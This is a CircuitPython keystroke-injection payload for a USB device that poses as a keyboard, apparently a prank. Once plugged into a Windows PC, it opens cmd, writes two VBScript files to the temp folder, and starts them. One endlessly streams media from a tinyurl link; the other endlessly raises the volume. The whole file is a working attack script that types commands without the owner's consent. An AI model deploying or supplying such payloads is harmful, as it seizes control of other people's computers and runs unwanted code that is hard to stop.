import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS as KeyboardLayout
from adafruit_hid.keycode import Keycode
from time import sleep


kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayout(kbd)

# ducky payload starts here

sleep(3.5)
kbd.send(Keycode.GUI, Keycode.R)
sleep(0.2)
layout.write(r'cmd')
kbd.send(Keycode.ENTER)
sleep(0.5)
layout.write(r'del %tmp%\rickyou.vbs')
kbd.send(Keycode.ENTER)
sleep(0.2)
layout.write(r'del %tmp%\volup.vbs')
kbd.send(Keycode.ENTER)
sleep(0.2)
layout.write(r'cd %tmp% && copy con rickyou.vbs')
kbd.send(Keycode.ENTER)
layout.write(r'While true')
kbd.send(Keycode.ENTER)
layout.write(r'Dim oPlayer')
kbd.send(Keycode.ENTER)
layout.write(r'Set oPlayer = CreateObject("WMPlayer.OCX")')
kbd.send(Keycode.ENTER)
layout.write(r'oPlayer.URL = "http://tinyurl.com/s63ve48"')
kbd.send(Keycode.ENTER)
layout.write(r'oPlayer.controls.play')
kbd.send(Keycode.ENTER)
layout.write(r"While oPlayer.playState <> 1 ' 1 = Stopped")
kbd.send(Keycode.ENTER)
layout.write(r'WScript.Sleep 100')
kbd.send(Keycode.ENTER)
layout.write(r'Wend')
kbd.send(Keycode.ENTER)
layout.write(r'oPlayer.close')
kbd.send(Keycode.ENTER)
layout.write(r'Wend')
kbd.send(Keycode.ENTER)
sleep(0.1)
kbd.send(Keycode.CONTROL, Keycode.Z)
kbd.send(Keycode.ENTER)
layout.write(r'copy con volup.vbs')
kbd.send(Keycode.ENTER)
layout.write(r'do')
kbd.send(Keycode.ENTER)
layout.write(r'Set WshShell = CreateObject("WScript.Shell")')
kbd.send(Keycode.ENTER)
layout.write(r'WshShell.SendKeys(chr(&hAF))')
kbd.send(Keycode.ENTER)
layout.write(r'loop')
kbd.send(Keycode.ENTER)
kbd.send(Keycode.CONTROL, Keycode.Z)
kbd.send(Keycode.ENTER)
layout.write(r'start rickyou.vbs && volup.vbs')
kbd.send(Keycode.ENTER)
layout.write(r'exit')
kbd.send(Keycode.ENTER)
